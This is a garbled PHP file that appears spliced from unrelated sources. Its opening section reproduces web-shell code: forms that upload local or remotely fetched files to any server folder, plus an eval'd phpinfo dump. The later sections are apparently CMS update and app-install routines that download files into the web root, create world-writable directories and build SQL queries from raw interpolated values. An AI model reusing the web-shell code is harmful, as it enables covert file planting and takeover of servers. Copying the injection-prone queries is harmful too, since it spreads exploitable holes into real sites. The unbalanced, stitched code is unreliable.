} else {
$msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
}
} elseif (isset($_REQUEST['uploadurl'])) {
// function dlfile($url,$fpath){
$p = cp(ss($_REQUEST['savefolderurl']));
if (!is_dir($p)) {
$p = cp(dirname($p));
}
$fu = ss($_REQUEST['fileurl']);
$fn = basename($fu);
if (isset($_REQUEST['savefilenameurl']) && trim($_REQUEST['savefilenameurl']) != "") {
$fn = ss($_REQUEST['savefilenameurl']);
}
$fp = cp($p) . $fn;
$st = dlfile($fu, $fp);
if ($st) {
$msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=" . $pwd . "&view=" . $fp . "\">" . $fp . "</a></p>";
} else {
$msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
}
}
$s_result .= $msg;
$s_result .= "\n\t\t<form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\" enctype=\"multipart/form-data\">\n\t\t<div class=\"mybox\"><h2>Upload from computer</h2>\n\t\t<table class=\"myboxtbl\">\n\t\t<tr><td style=\"width:100px;\">File</td><td><input type=\"file\" name=\"filepath\" class=\"inputzbut\" style=\"width:400px;margin:0;\" />\n\t</td></tr>\n\t\t<tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolder\" value=\"" . $pwd . "\" /></td></tr>\n\t\t<tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilename\" value=\"\" /></td></tr>\n\t\t<tr><td> </td><td>\n\t\t<input type=\"submit\" name=\"uploadhd\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\n\t</td></tr>\n\n\t\t<input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\n\t\t</table>\n\t\t</div>\n\t\t</form>\n\n\t\t<form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\">\n\t\t<div class=\"mybox\"><h2>Upload from internet</h2>\n\t\t<table class=\"myboxtbl\">\n\t\t<tr><td style=\"width:100px;\">File URL</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"fileurl\" value=\"\" />\n\t</td></tr>\n\t\t<tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolderurl\" value=\"" . $pwd . "\" /></td></tr>\n\t\t<tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilenameurl\" value=\"\" /></td></tr>\n\t\t<tr><td> </td><td>\n\t\t<input type=\"submit\" name=\"uploadurl\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\n\t</td></tr>\n\n\t\t<input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\n\t\t</table>\n\t\t</div>\n\t\t</form>\n\n\t\t";
} elseif (isset($_REQUEST['phpinfo'])) {
ob_start();
eval("phpinfo();");
$b = ob_get_contents();
ob_end_clean();
$a = strpos($b, "<body>") + 6;
// yeah baby,, your body is wonderland ;-)
$c = count($_GP['fileurl']);
for ($i = 0; $i < $c; $i++) {
$s_fu = $_GP['fileurl'][$i];
if (empty($s_fu)) {
continue;
}
$s_p = cp($_GP['savefolderurl'][$i]);
if (!@is_dir($s_p)) {
mkdir($s_p);
}
$s_fn = basename($s_fu);
if (isset($_GP['savefilenameurl'][$i]) && trim($_GP['savefilenameurl'][$i]) != "") {
$s_fn = $_GP['savefilenameurl'][$i];
}
$s_fp = cp($s_p) . $s_fn;
$s_st = dlfile($s_fu, $s_fp);
if ($s_st) {
$s_msg .= notif("File uploaded to <a href='" . $s_self . "view=" . pl($s_fp) . "'>" . $s_fp . "</a>");
} else {
$s_msg .= notif("Failed to upload " . $s_fn);
}
}
} else {
if (!@is_writable($s_cwd)) {
$s_msg = notif("Directory " . $s_cwd . " is not writable, please change to a writable one");
}
}
if (!empty($s_msg)) {
$s_result .= $s_msg;
}
$s_result .= "\n\t\t\t<form action='" . $s_self . "' method='post' enctype='multipart/form-data'>\n\t\t\t<div class='mybox'><h2><div class='but' onclick='adduploadc();'>+</div>Upload from computer</h2>\n\t\t\t<table class='myboxtbl'>\n\t\t\t<tbody id='adduploadc'>\n\t\t\t<tr><td style='width:140px;'>File</td><td><input type='file' name='filepath[]' class='inputzbut' style='width:400px;margin:0;' /></td></tr>\n\t\t\t<tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolder[]' value='" . hss($s_cwd) . "' /></td></tr>\n\t\t\t<tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilename[]' value='' /></td></tr>\n\t\t\t</tbody>\n\t\t\t<tfoot>\n\t\t\t<tr><td> </td><td>\n\t\t\t<input type='submit' name='uploadhd' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n\t\t\t<input type='hidden' name='x' value='upload' />\n\t\t\t</td></tr>\n\t\t\t</tfoot>\n\t\t\t</table>\n\t\t\t</div>\n\t\t\t</form>\n\t\t\t<form action='" . $s_self . "' method='post'>\n\t\t\t<div class='mybox'><h2><div class='but' onclick='adduploadi();'>+</div>Upload from internet</h2>\n\t\t\t<table class='myboxtbl'>\n\t\t\t<tbody id='adduploadi'>\n\t\t\t<tr><td style='width:150px;'>File URL</td><td><input style='width:100%;' class='inputz' type='text' name='fileurl[]' value='' />\n\t\t\t</td></tr>\n\t\t\t<tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolderurl[]' value='" . hss($s_cwd) . "' /></td></tr>\n\t\t\t<tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilenameurl[]' value='' /></td></tr>\n\t\t\t</tbody>\n\t\t\t<tfoot>\n\t\t\t<tr><td> </td><td>\n\t\t\t<input type='submit' name='uploadurl' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n\t\t\t<input type='hidden' name='x' value='upload' />\n\t\t\t</td></tr>\n\t\t\t</table>\n\t\t\t</div>\n\t\t\t</form>";
}
break;
case 2:
$adminfile = $url_array[count($url_array) - 2];
$strsvalto = readmin($val[1], $adminfile, 1);
filetest('../../../' . $val[1]);
deldir('../../../' . $val[1]);
$dlappfile = parse_ini_file('dlappfile.php', true);
if ($dlappfile[$strsvalto]['dlfile']) {
$return = varcodeb('app');
$checksum = $return['md5'];
$met_file = '/dl/app_curl.php';
$stringfile = dlfile($dlappfile[$strsvalto]['dlfile'], "../../../{$val['1']}");
} else {
$met_file = '/dl/olupdate_curl.php';
$stringfile = dlfile("v{$metcms_v}/{$strsvalto}", "../../../{$val['1']}");
}
if ($stringfile == 1) {
echo $lang_physicalupdatesuc;
} else {
echo dlerror($stringfile);
die;
}
break;
case 3:
$fileaddr = explode('/', $val[1]);
$filedir = "../../../" . $fileaddr[0];
if (!file_exists($filedir)) {
@mkdir($filedir, 0777);
}
if ($fileaddr[1] == "index.php") {
} else {
$query = "update {$met_app} set name='{$appval['0']}',ver='{$appval['2']}',img='{$appval['3']}',info='{$appval['4']}',file='{$appval['5']}',power='{$appval['6']}',sys='{$appval['7']}',site='{$appval['8']}',url='{$appval['9']}',addtime='{$appval['10']}',updatetime='{$appval['11']}' where no='{$appval['1']}' and download=0";
$db->query($query);
$query = "update {$met_app} set name='{$appval['0']}',img='{$appval['3']}',info='{$appval['4']}',updatetime='{$appval['11']}' where no='{$appval['1']}' and download=1";
$db->query($query);
$str_apps[$appval[1]] = $appval;
}
} else {
$query = "insert into {$met_app} set name='{$appval['0']}',no='{$appval['1']}',ver='{$appval['2']}',img='{$appval['3']}',info='{$appval['4']}',file='{$appval['5']}',power='{$appval['6']}',sys='{$appval['7']}',site='{$appval['8']}',url='{$appval['9']}',addtime='{$appval['10']}',updatetime='{$appval['11']}',download='0'";
$db->query($query);
$str_apps[$appval[1]] = $appval;
}
}
$checksum = 'img';
foreach ($str_apps as $appskey => $appsval) {
dlfile($appsval[3], "../dlapp/img/{$appsval['3']}");
}
$appaddokx = $db->get_one("SELECT * FROM {$met_app} where name!=''");
if ($appaddokx) {
$query = "update {$met_config} set value='{$info['1']}' where name='met_apptime'";
$db->query($query);
}
}
}
}
/*
if($action=='info'){
$query="select * from $met_app where download=0";
$result=$db->query($query);
while($list= $db->fetch_array($result)){
$app_nodl[$list[no]]=$list;
$str = file_get_contents("../update/{$addr}/dlfilelist.txt");
if ($str) {
if ($str != 'No Date') {
$strs = explode('|', $str);
}
array_push($strs, 'update.php');
array_push($strs, 'sql.sql');
$string = "<?php\n \$strs=" . var_export($strs, true) . "; ?>";
file_put_contents("../update/{$addr}/dlfilelist.txt", $string);
echo "{$lang_updaterr9}0%<script type=\"text/javascript\">olflie('{$olid}','{$ver}','dl',0);</script>";
}
} else {
if ($action == 'dl') {
include "../update/{$addr}/dlfilelist.txt";
$strsnum = count($strs);
$return = dlfile("{$addr}/{$strs[$numnow]}", "../update/{$addr}/{$strs[$numnow]}");
$numnow++;
if ($return != 1) {
dl_error($strs[$numnow - 1] . $lang_updownerrs . dlerror($return), $type, $olid, $ver, $addr, $action, $numnow);
}
if ($strsnum == $numnow) {
$sql = file_get_contents("../update/{$addr}/sql.sql");
if ($sql != "No Date") {
echo "{$lang_updaterr10}<script type=\"text/javascript\">setTimeout(function (){olupdate('{$olid}','{$ver}','sql');},500);</script>";
} else {
echo $lang_jsx26 . "<script type=\"text/javascript\">olupdate('{$olid}','{$ver}','update');</script>";
}
checksumdel($type);
} else {
$percentage = floor($numnow / $strsnum * 100);
echo $lang_updaterr9 . "{$percentage}%<script type=\"text/javascript\">olflie('{$olid}','{$ver}','dl','{$numnow}');</script>";
require_once ROOTPATH . 'include/export.func.php';
if ($action == 'patch') {
$met_file = '/dl/patch.php';
$post_data = array('ver' => $metcms_v, 'patch' => $met_patch);
$difilelist = curl_post($post_data, 10);
if ($difilelist != 'nohost') {
$difilelists = explode('*', $difilelist);
$met_file = '/dl/olupdate_curl.php';
foreach ($difilelists as $key => $val) {
$difilelistss = explode('|', $val);
$met_patch = $difilelistss[0];
unset($difilelistss[0]);
foreach ($difilelistss as $key1 => $val1) {
$val2 = readmin($val1, $met_adminfile, 2);
filetest("../../{$val2}");
$re = dlfile("v{$metcms_v}/{$val1}", "../../{$val2}");
if ($re != 1) {
echo $re;
die;
}
}
if (file_exists("../../{$met_adminfile}/update/v{$metcms_v}_{$met_patch}.php")) {
require_once "../../{$met_adminfile}/update/v{$metcms_v}_{$met_patch}.php";
}
@unlink("../../{$met_adminfile}/update/v{$metcms_v}_{$met_patch}.php");
$query = "update {$met_config} set value='{$met_patch}' where name='met_patch'";
$db->query($query);
}
echo 1;
} else {
echo 2;
